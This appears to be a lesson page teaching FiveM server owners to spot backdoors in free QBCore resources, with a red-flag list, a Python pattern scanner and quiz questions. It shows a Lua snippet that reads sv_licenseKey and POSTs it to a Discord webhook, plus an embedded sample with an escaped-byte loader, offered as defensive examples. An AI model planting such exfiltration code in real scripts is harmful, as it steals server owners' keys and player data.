Debugging and securing your resources · Lesson 2/3 · 9 min
Anatomy of a FiveM backdoor
Knowing how they attack is the best defense. These are the patterns malicious scripts hide behind.
Many free QBCore "leaks" come with surprises: backdoors that give the attacker access, steal data or mine crypto on your server. Recognizing their patterns saves your city.
Red flags in a resource
- Exfiltration: Discord webhooks (discord.com/api/webhooks) that send data out of the server.
- Obfuscated code: assert(load(...)), huge base64 strings or unreadable \xNN escape sequences.
- Hidden execution: os.execute, io.popen, or a PerformHttpRequest that downloads code and runs it.
- Admin backdoor: add_principal or ExecuteCommand that grants the attacker permissions.
- Key theft: reading sv_licenseKey, steam_webApiKey or the MySQL connection string.
- Mining: references to xmrig, stratum+tcp or Monero pools.
-- 🚩 Backdoor (do NOT use this): sends your licenseKey to a foreign Discord
local key = GetConvar('sv_licenseKey', '')
PerformHttpRequest('https://discord.com/api/webhooks/...', function() end,
    'POST', json.encode({ content = key }), { ['Content-Type'] = 'application/json' })
Malicious pattern
Downloaded something and not sure? Upload it to the Crxative-M Security Audit: it scans these patterns and tells you if it comes with surprises before you install it on your server.
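The red flags above are simple enough to grep for, and that is exactly what a first-pass audit does. The following scanner is an added example written for this lesson, not the Crxative-M audit's own code: it walks the .lua files of a resource, matches each line against the patterns listed above, and rates the file. Two constructed sample scripts are embedded so it runs offline; the webhook URL is a placeholder, and the rule names and severity levels are this example's own choices, not anything FiveM or QBCore defines.

```python
"""Red-flag scanner for FiveM Lua resources (added example, not Crxative-M code).

Rules are taken from the red-flag list in the lesson. A match is not proof of a
backdoor (load() and GetPlayerIdentifiers() have honest uses), so the report
groups findings and gives the file a severity that a human should then review.
"""
import re
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    text: str


# Rule name -> regex applied per line. Names/levels are this example's convention.
RULES = {
    "exfiltration/discord-webhook": re.compile(r"discord(?:app)?\.com/api/webhooks", re.I),
    "data-access/player-identifiers": re.compile(r"\bGetPlayerIdentifiers\s*\("),
    "obfuscation/load-assert": re.compile(r"\bassert\s*\(\s*load\s*\(|\bload(?:string)?\s*\("),
    # 8+ consecutive \xNN or \ddd escapes: a string being hidden from the reader
    "obfuscation/escaped-bytes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|(?:\\\d{1,3}){8,}"),
    "obfuscation/long-base64": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    "hidden-exec/os-io": re.compile(r"\bos\.execute\s*\(|\bio\.popen\s*\("),
    "hidden-exec/http-fetch": re.compile(r"\bPerformHttpRequest\s*\("),
    "admin-backdoor": re.compile(r"\badd_principal\b|\bExecuteCommand\s*\("),
    "key-theft": re.compile(r"sv_licenseKey|steam_webApiKey|mysql_connection_string", re.I),
    "mining": re.compile(r"\bxmrig\b|stratum\+tcp|monero", re.I),
}

HIGH_RULES = {"hidden-exec/os-io", "admin-backdoor", "mining", "obfuscation/load-assert",
              "obfuscation/escaped-bytes", "obfuscation/long-base64"}


def scan_source(path, source):
    """Return every rule hit in one file, line by line."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        for rule, pattern in RULES.items():
            if pattern.search(line):
                findings.append(Finding(path, number, rule, line.strip()))
    return findings


def assess(findings):
    """Rate a file: critical = sensitive data + an outbound webhook in the same file."""
    rules = {f.rule for f in findings}
    if "exfiltration/discord-webhook" in rules and rules & {"key-theft", "data-access/player-identifiers"}:
        return "critical"
    if rules & HIGH_RULES:
        return "high"
    return "review" if rules else "clean"


def scan_resource(files):
    """files: {relative path: source text}. Returns {path: (severity, findings)}."""
    report = {}
    for path, source in files.items():
        findings = scan_source(path, source)
        report[path] = (assess(findings), findings)
    return report


def scan_directory(root):
    """Scan every .lua file under a resource folder on disk."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(errors="replace") for p in root.rglob("*.lua")}
    return scan_resource(files)


# Constructed samples (not real resources). The first reproduces the lesson's backdoor
# plus an obfuscated loader; the second is an ordinary, honest server script.
SAMPLE_BACKDOOR = r"""
-- looks like a normal server script
local key = GetConvar('sv_licenseKey', '')
PerformHttpRequest('https://discord.com/api/webhooks/PLACEHOLDER', function() end,
    'POST', json.encode({ content = key }), { ['Content-Type'] = 'application/json' })
assert(load("\x6c\x6f\x63\x61\x6c\x20\x78\x3d\x31"))()
"""

SAMPLE_CLEAN = r"""
local QBCore = exports['qb-core']:GetCoreObject()
RegisterNetEvent('shop:buy', function(item)
    local src = source
    TriggerClientEvent('ox_lib:notify', src, { description = 'Bought ' .. item })
end)
"""

if __name__ == "__main__":
    report = scan_resource({"server.lua": SAMPLE_BACKDOOR, "shop.lua": SAMPLE_CLEAN})
    for path, (severity, findings) in report.items():
        print(f"{path}: {severity.upper()} ({len(findings)} findings)")
        for f in findings:
            print(f"  line {f.line} [{f.rule}] {f.text[:70]}")
```

Run it against a downloaded resource with `scan_directory('path/to/resource')`. The scanner only confirms the patterns you would otherwise search for by hand, so treat "critical" as "do not install" and "high" or "review" as "read those lines yourself before deciding"; a clean result still means the resource goes to a test server first.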
Practice what you learned
In a free QBCore "leak" you see these lines: local key = GetConvar('sv_licenseKey', '') / PerformHttpRequest('https://discord.com/api/webhooks/...', function() end, 'POST', json.encode({ content = key })). What is happening?
Hint
GetConvar('sv_licenseKey') + PerformHttpRequest to a Discord = your data leaving the server.
Which of these lines is the MOST suspicious of hiding a backdoor in a FiveM resource?
Hint
Honest code has nothing to hide. Why would it be obfuscated as \xNN?
Put the steps in the correct order for when someone hands you a free, suspicious resource, BEFORE installing it on your production server.
Use the arrows to place the lines in the correct order.
- If everything is clean, I try it first on a TEST server, never directly in production.
- I check whether it reads sv_licenseKey, tokens or the MySQL connection, or grants itself add_principal.
- I run it through the Crxative-M Security Audit to scan for those patterns.
- I open the .lua files and look for patterns: Discord webhooks, load(/assert, os.execute, io.popen, base64/\xNN.
Hint
First you inspect by hand, then you scan, then you test in isolation. Production comes last.
Challenge: code it yourself
You're handed a script with a PerformHttpRequest line to a Discord webhook that sends GetPlayerIdentifiers. What happens and what would you do?
Write it yourself in your editor (VS Code) and test it on your server. You learn here by doing it, not by copying.
See hint
It's exfiltration of player data to an external Discord. Don't install it and audit the rest.
Write your solution here:
